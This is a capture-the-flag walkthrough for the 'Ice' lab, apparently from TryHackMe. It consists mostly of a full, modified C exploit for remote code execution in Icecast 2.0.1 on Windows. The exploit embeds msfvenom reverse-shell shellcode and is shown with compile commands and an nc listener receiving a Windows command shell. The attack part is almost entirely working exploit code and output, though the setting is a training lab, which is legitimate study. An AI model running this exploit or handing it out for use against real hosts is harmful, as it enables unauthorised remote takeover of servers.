Ice Task 7 (H)

Manual Exploiting Windows & Privilege Escalation

Task 7: Explore manual exploitation via exploit code found on exploit-db. Exploit link: https://www.exploit-db.com/exploits/568

The original code did not work; here is the modified version:

1) Before running msfvenom to create the reverse shell, modify the LHOST value; afterwards, replace the array with your own shellcode.

/* 

Original exploit here: https://www.exploit-db.com/exploits/568
I couldn't get this to work so I edited it according to
https://www.exploit-db.com/exploits/573

and made sure the shellcode was executed.

Compile and run
root@Kali:~/TryHackme/Ice# gcc 568-edit.c -o 568
root@Kali:~/TryHackme/Ice# ./568 192.168.92.133

Icecast <= 2.0.1 Win32 remote code execution 0.1
by Luigi Auriemma
e-mail: aluigi@altervista.org
web:http://aluigi.altervista.org

shellcode add-on by Delikon
www.delikon.de

- target 192.168.92.133:8000
- send malformed data

Server IS vulnerable!!!

On listener
root@Kali:~# nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.92.128] from (UNKNOWN) [192.168.92.133] 49238
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Program Files (x86)\Icecast2 Win32>

*/ 

#include <stdio.h> 
#include <stdlib.h> 
#include <string.h> 

#ifdef WIN32 
#pragma comment(lib, "ws2_32.lib") 
    #include <winsock.h> 
    #include "winerr.h" 

    #define close closesocket 
#else 
    #include <unistd.h> 
    #include <sys/socket.h> 
    #include <sys/types.h> 
    #include <arpa/inet.h> 
    #include <netdb.h> 
    #include <netinet/in.h> 
#endif 

#define VER "0.1" 
#define PORT 8000 
#define BUFFSZ 2048 
#define TIMEOUT 3 
#define EXEC    "GET / HTTP/1.0\r\n" \
                "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" \
                "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" \
                "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" \
                "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" \
                "\xcc" 

// msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.10.98.179 LPORT=443 -b '\x0a\x0d\x00' -f c
/*
 * Opaque, encoder-generated payload produced by the msfvenom line above
 * (windows/shell_reverse_tcp, x86). The bytes 0x00, 0x0a and 0x0d were
 * excluded with -b because main() splices this array into the request with
 * strcpy(), which stops at the first NUL, and CR/LF are the line delimiters
 * of the HTTP request built in EXEC. Being encoded, the bytes are not
 * readable as instructions; treat the array as a fixed blob and regenerate
 * it rather than editing by hand. The LHOST/LPORT baked into it must match
 * the listener (the sample run above listens on 443).
 */
unsigned char shellcode[] =
"\xb8\x78\xe5\xde\x0b\xda\xd3\xd9\x74\x24\xf4\x5b\x33\xc9\xb1"
"\x52\x31\x43\x12\x83\xeb\xfc\x03\x3b\xeb\x3c\xfe\x47\x1b\x42"
"\x01\xb7\xdc\x23\x8b\x52\xed\x63\xef\x17\x5e\x54\x7b\x75\x53"
"\x1f\x29\x6d\xe0\x6d\xe6\x82\x41\xdb\xd0\xad\x52\x70\x20\xac"
"\xd0\x8b\x75\x0e\xe8\x43\x88\x4f\x2d\xb9\x61\x1d\xe6\xb5\xd4"
"\xb1\x83\x80\xe4\x3a\xdf\x05\x6d\xdf\xa8\x24\x5c\x4e\xa2\x7e"
"\x7e\x71\x67\x0b\x37\x69\x64\x36\x81\x02\x5e\xcc\x10\xc2\xae"
"\x2d\xbe\x2b\x1f\xdc\xbe\x6c\x98\x3f\xb5\x84\xda\xc2\xce\x53"
"\xa0\x18\x5a\x47\x02\xea\xfc\xa3\xb2\x3f\x9a\x20\xb8\xf4\xe8"
"\x6e\xdd\x0b\x3c\x05\xd9\x80\xc3\xc9\x6b\xd2\xe7\xcd\x30\x80"
"\x86\x54\x9d\x67\xb6\x86\x7e\xd7\x12\xcd\x93\x0c\x2f\x8c\xfb"
"\xe1\x02\x2e\xfc\x6d\x14\x5d\xce\x32\x8e\xc9\x62\xba\x08\x0e"
"\x84\x91\xed\x80\x7b\x1a\x0e\x89\xbf\x4e\x5e\xa1\x16\xef\x35"
"\x31\x96\x3a\x99\x61\x38\x95\x5a\xd1\xf8\x45\x33\x3b\xf7\xba"
"\x23\x44\xdd\xd2\xce\xbf\xb6\xd6\x04\xdd\xf5\x8f\x1a\x21\xfb"
"\xf4\x92\xc7\x91\x1a\xf3\x50\x0e\x82\x5e\x2a\xaf\x4b\x75\x57"
"\xef\xc0\x7a\xa8\xbe\x20\xf6\xba\x57\xc1\x4d\xe0\xfe\xde\x7b"
"\x8c\x9d\x4d\xe0\x4c\xeb\x6d\xbf\x1b\xbc\x40\xb6\xc9\x50\xfa"
"\x60\xef\xa8\x9a\x4b\xab\x76\x5f\x55\x32\xfa\xdb\x71\x24\xc2"
"\xe4\x3d\x10\x9a\xb2\xeb\xce\x5c\x6d\x5a\xb8\x36\xc2\x34\x2c"
"\xce\x28\x87\x2a\xcf\x64\x71\xd2\x7e\xd1\xc4\xed\x4f\xb5\xc0"
"\x96\xad\x25\x2e\x4d\x76\x55\x65\xcf\xdf\xfe\x20\x9a\x5d\x63"
"\xd3\x71\xa1\x9a\x50\x73\x5a\x59\x48\xf6\x5f\x25\xce\xeb\x2d"
"\x36\xbb\x0b\x81\x37\xee";

/* 
in my example 0xcc is used to interrupt the code execution, you must 
put your shellcode exactly there. 
You don't need to call a shellcode offset (CALL ESP, JMP ESP and so 
on) or do any other annoying operation, because the code flow 
points directly there!!! 
Cool and easy 8-) 
*/ 


/*int startWinsock(void) 
{ 
  WSADATA wsa; 
  return WSAStartup(MAKEWORD(2,0),&wsa); 
} 
*/
int timeout(int sock); 
u_long resolv(char *host); 
void std_err(void); 

/*
 * Entry point: builds one HTTP GET request from EXEC (31 "a" header lines
 * followed by a 0xcc sentinel), overwrites the sentinel with `shellcode`,
 * sends it to <server>[:port] and reports whether the server stopped
 * answering. Per the header comment only Icecast <= 2.0.1 Win32 is affected.
 *
 * argv[1] is the target host or IPv4 address (resolved by resolv()),
 * argv[2] an optional TCP port; default PORT (8000). Exits with 1 on usage,
 * resolution or socket errors, 0 otherwise.
 */
int main(int argc, char *argv[]) { 
    struct sockaddr_in peer;    /* NOTE(review): never memset; only the three fields below are set */ 
    int sd; 
    u_short port = PORT; 
    u_char buff[BUFFSZ];        /* receive scratch space for the verdict check */ 
    u_char buf[4096];           /* outgoing request: EXEC + shellcode + two CRLF */ 
    u_char *pointer=NULL; 

    /* unbuffered stdout so the progress lines appear before a possible hang */ 
    setbuf(stdout, NULL); 

    fputs("\n" 
        "Icecast <= 2.0.1 Win32 remote code execution "VER"\n" 
        "by Luigi Auriemma\n" 
        "e-mail: aluigi@altervista.org\n" 
        "web:http://aluigi.altervista.org\n" 
  "\nshellcode add-on by Delikon\n" 
  "www.delikon.de" 
        "\n", stdout); 

    if(argc < 2) { 
        /* NOTE(review): this usage text is stale — it describes the original
           NCAT/9999 payload, while the shellcode above is a reverse shell to
           LPORT=443 (see the msfvenom line); "spwan" is also a typo. */ 
        printf("\nUsage: %s <server> [port(%d)]\n" 
            "\n" 
            "Note: This exploit will force the Icecast server to download NCAT\n" 
            "and after execution it will spwan a shell on 9999\n" 
            "\n", argv[0], PORT); 
        exit(1); 
    } 

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);    /* NOTE(review): return value unchecked */
#endif

    /* atoi() gives no error signal: a non-numeric argument becomes port 0 */ 
    if(argc > 2) port = atoi(argv[2]); 

    peer.sin_addr.s_addr = resolv(argv[1]); 
    peer.sin_port= htons(port); 
    peer.sin_family= AF_INET; 

    /* buf is u_char but is handed to the <string.h> functions as char*;
       strrchr() converts 0xcc to char, so it still matches the sentinel. */ 
    memset(buf,0x00,sizeof(buf)); 
    strcpy(buf,EXEC); 
    
/* locate the 0xcc that terminates EXEC and paste the payload over it;
   strcpy() works here only because the payload was generated without 0x00 */ 
pointer =strrchr(buf,0xcc); 

strcpy(pointer,shellcode); 

/* blank line ends the HTTP header section */ 
strcat(buf,"\r\n"); 
strcat(buf,"\r\n"); 
    

    printf("\n- target %s:%hu\n", 
        inet_ntoa(peer.sin_addr), port); 

    sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); 
    if(sd < 0) std_err(); 

    if(connect(sd, (struct sockaddr *)&peer, sizeof(peer)) 
      < 0) std_err(); 

    fputs("- send malformed data\n", stdout); 
    /* NOTE(review): only a failed send() is detected; a short send is not */ 
    if(send(sd, buf, strlen(buf), 0) 
      < 0) std_err(); 

    /* The verdict is a heuristic: "vulnerable" means no reply arrived within
       TIMEOUT seconds or recv() failed, i.e. the server no longer answers.
       A slow, filtered or already-down host therefore reads as vulnerable. */ 
    if((timeout(sd) < 0) || (recv(sd, buff, BUFFSZ, 0) < 0)) { 
        fputs("\nServer IS vulnerable!!!\n\n", stdout); 
    } else { 
        fputs("\nServer doesn't seem vulnerable\n\n", stdout); 
    } 

    close(sd); 
    return(0); 
} 

/*
 * Wait up to TIMEOUT seconds for `sock` to become readable.
 *
 * Returns 0 when data (or EOF) is available, -1 when the wait expired.
 * A select() failure is fatal and goes through std_err().
 * NOTE(review): FD_SET() is undefined for sock >= FD_SETSIZE; callers here
 * only pass a freshly created socket, so this is not checked.
 */
int timeout(int sock) { 
    fd_set readable; 
    struct timeval limit = { .tv_sec = TIMEOUT, .tv_usec = 0 }; 
    int ready; 

    FD_ZERO(&readable); 
    FD_SET(sock, &readable); 
    ready = select(sock + 1, &readable, NULL, NULL, &limit); 
    if(ready < 0) std_err(); 
    /* select() reports 0 on expiry, >0 when the descriptor is ready */ 
    return ready ? 0 : -1; 
} 

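/*
 * Resolve `host` (dotted-quad or hostname) to an IPv4 address in network
 * byte order, suitable for sin_addr.s_addr.
 *
 * Exits with status 1 when the name cannot be resolved to an IPv4 address.
 * Note that inet_addr() returns INADDR_NONE for "255.255.255.255" as well,
 * so that literal is treated as a hostname lookup.
 */
u_long resolv(char *host) { 
    struct hostent *hp; 
    struct in_addr addr; 
    u_long host_ip; 

    host_ip = inet_addr(host); 
    if(host_ip == INADDR_NONE) { 
        hp = gethostbyname(host); 
        /* require a usable IPv4 record before touching h_addr_list */ 
        if(!hp || hp->h_addrtype != AF_INET || 
           hp->h_length != (int)sizeof(addr) || !hp->h_addr_list[0]) { 
            printf("\nError: Unable to resolve hostname (%s)\n", host); 
            exit(1); 
        } 
        /* copy exactly the 4 address bytes: the previous *(u_long *)h_addr
           read sizeof(u_long) bytes (8 on LP64) from a 4-byte record and
           relied on an unaligned, aliasing-violating access */ 
        memcpy(&addr, hp->h_addr_list[0], sizeof(addr)); 
        host_ip = addr.s_addr; 
    } 
    return(host_ip); 
} 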

#ifndef WIN32 
    /* Non-Windows fallback for std_err() (presumably supplied by winerr.h on
       WIN32): abort the run with status 1 after a socket call failed.
       NOTE(review): errno is discarded, so a failed socket()/connect()/send()
       exits silently; a perror() here would name the failing call. */ 
    void std_err(void) { 
        exit(1); 
    } 
#endif 

// milw0rm.com [2004-10-06]

2) Compile it with the command:

gcc exploit.c -o exploit-compiled

Hackersploit Walkthrough
